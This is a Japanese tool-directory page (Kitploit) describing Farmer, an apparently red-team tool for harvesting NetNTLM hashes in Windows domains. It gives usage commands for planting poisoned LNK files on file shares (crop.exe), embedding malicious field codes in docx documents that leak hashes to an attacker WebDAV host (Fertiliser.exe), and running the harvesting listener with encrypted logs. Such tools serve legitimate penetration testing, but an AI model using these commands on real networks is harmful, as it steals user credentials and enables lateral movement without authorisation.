Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Farmer — ローカルWebDAVサーバを介してWindowsドメイン内のNetNTLMハッシュを収集し、LNKファイルポイズニングとOffice文書のフィールドコードインジェクションを使用して横展開と資格情報の取得を行います。 | Kitploit
ツール/GitHubGitHub/mdsecactivebreach/farmer
フィッシングツールパスワード攻撃横移動情報収集ウェブセキュリティペネトレーションテストレッドチーミング
GitHubmdsecactivebreach/farmer

Farmer

ローカルWebDAVサーバを介してWindowsドメイン内のNetNTLMハッシュを収集し、LNKファイルポイズニングとOffice文書のフィールドコードインジェクションを使用して横展開と資格情報の取得を行います。

リポジトリを見る
427605年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Farmer

著者: @domchell

概要

農家になりたかったので、ハッシュの収穫を始めました

Farmer は、Windows ドメイン内で NetNTLM ハッシュを収集するためのプロジェクトです。Farmer は、ローカル WebDAV サーバーを作成することでこれを実現し、接続するクライアントに対して WebDAV ミニリダイレクタが認証を行うようにします。

Farmer を成功させるためには、クライアントがローカル WebDAV サーバーに接続できる必要があります。これを妨げる可能性のあるものとして、ネットワークのセグメンテーションや Windows ファイアウォールなどが挙げられます。事前にこれらを確認してください(ヒント Seatbelt WindowsFirewall)。

作物の拡散

Farmer には Crop ツールのサブモジュールが含まれています。このツールは、LNK ファイルを作成して、その LNK が保存されているフォルダを閲覧した際に WebDAV 接続を開始させるために使用できます。これは、保存されたアイコンをレンダリングしようとするためです。

この攻撃の概念は、Crop を使用して目的のファイル共有に LNK ファイルを仕込み、その LNK が Farmer WebDAV サーバーを指すようにするというものです。

例:

root@kitploit:~
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest

ユーザーが \fileserver\Common を閲覧すると、エクスプローラは Farmer WebDAV サーバーからアイコンを取得しようとし、その過程でユーザーの NetNTLM ハッシュを送信します。

作物の施肥

Farmer には Fertiliser ツールの別のサブモジュールが含まれています。このツールは、Office 文書(現時点では docx のみ)に悪意のあるフィールドコードを埋め込むために使用できます。これにより、文書が開かれたときにフィールドコードが解析され、選択した WebDAV サーバーにハッシュが漏洩します :)

例:

root@kitploit:~
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"

農業

Farmer はユーザー定義のポートで待機し、指定された秒数だけ動作し、必要に応じて出力をファイルシステムに書き込みます:

使い方:

root@kitploit:~
farmer.exe <port> [seconds] [output]

秒数が指定されない場合、または 0 に設定された場合、Farmer は無期限に実行されます。例:

root@kitploit:~
farmer.exe 8888 0 c:\windows\temp\test.tmp

Farmer をポート 8888 で 1 分間実行するには、次のようにします:

root@kitploit:~
farmer.exe 8888 60

Farmer のログをファイルシステムに書き込む場合、Config.key で設定されたキーを使用し、encrypt ブール値を true(デフォルトは false)に設定することで、ログファイルを AES 暗号化できます。

ログファイルは HarvestCrop ツールで復号化できます。例:

root@kitploit:~
harvestcrop.exe c:\windows\temp\test.tmp farmer
ツールをダウンロード